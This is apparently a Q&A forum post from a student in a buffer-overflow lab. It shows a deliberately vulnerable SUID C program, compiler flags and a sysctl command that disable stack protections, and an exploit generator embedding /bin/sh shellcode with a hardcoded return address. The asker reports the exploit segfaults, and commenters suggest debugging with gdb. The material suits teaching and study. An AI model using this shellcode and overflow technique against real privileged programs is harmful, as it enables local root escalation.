# WHY does this buffer overflow attack code issue segmentation fault

Tags: c, linux, buffer-overflow, exploit

I am currently studying about buffer overflow exploit and encountered such a problem which required me to exploit the following SUID program.

```
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[24];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
}
```

This program was compiled on my 64-bit Ubuntu 14.04 distribution with command

```
gcc -m32 -o stack -z execstack -fno-stack-protector stack.c
```

and then I switched to root account and applied 'chmod 4755' on it. Moreover, the stack randomization has been turned off with command

```
sysctl -w kernel.randomize_va_space=0
```

under root account.

So what's left for me to do was to create a file named 'badfile' which contained some malicious code that can overflow the buffer string in the previous program and cause damage.

The program I wrote to create 'badfile' was shown below (the main part of the program has been provided, so all I did was to fill the missing part):

```
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
    /* You need to fill the buffer with appropriate contents here */

    /* I tested and found out that the stack on my machine always start at
     approximately 0xffffd11b, so here I set the 28th,29th,30th and 31st 
     entries of this buffer string to be an address that is slightly larger 
     than 0xffffd11b, say 0xffffd130 */
    buffer[31]=0xff;
    buffer[30]=0xff;
    buffer[29]=0xd1;
    buffer[28]=0x30;
    /* Then I copy the shell code contained in the 'shellcode' string and
     place it somewhere far behind, so that when I run the 'stack' program, it 
    will execute the bof function, return to the address of 0xffd130, and then 
    go though some NOP, and eventually hit this shell code. */
    size_t count = 0;
    for (count = 0; count != (sizeof(shellcode)-1); ++count)
    {
        buffer[200+count] = shellcode[count];
    }

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
```

This program was compiled with command

```
gcc -m32 -o exploit exploit.c
```

after I ran this compiled program, I had the file 'badfile' in my working directory. Then, I ran the 'stack' program, expecting to invoke a root-privileged shell, but instead I received a warning saying `segmentation fault(core dumped)`, for which I could not figure out the cause of this failure. Hope that you guys can help me out here. Thanks in advance!

Comment: Maybe one of the compiler `stack-checkin` is still effective. Have a look to the gcc man https://gcc.gnu.org/onlinedocs/gccint/Stack-Checking.html

Comment: "segmentation fault" It is not a failure. It is a normal and desirable behaviour of the system when a user program does illegal things. *Root-privileged shell* is a failure.

Comment: @n.m. Pardon me for my bad choice of word and thank you for the clarification. Any thoughts how to deal with this segmentation fault?

Comment: Yes! Say "thank Bob my system is working properly". You have learned a certain skill, say how to break into an unlocked room (not too hard). Now when the room is locked this is not a very useful skill, is it? Move on to learn how to pick high security locks maybe.

Comment: It's a bit too metaphorical to me. Are you saying that I should just leave it be and move on? Anyway, is it a way that I can make the program work as I intended?

Comment: Run gdb using the core file to analyse the crash, chances are it will help you understand what went wrong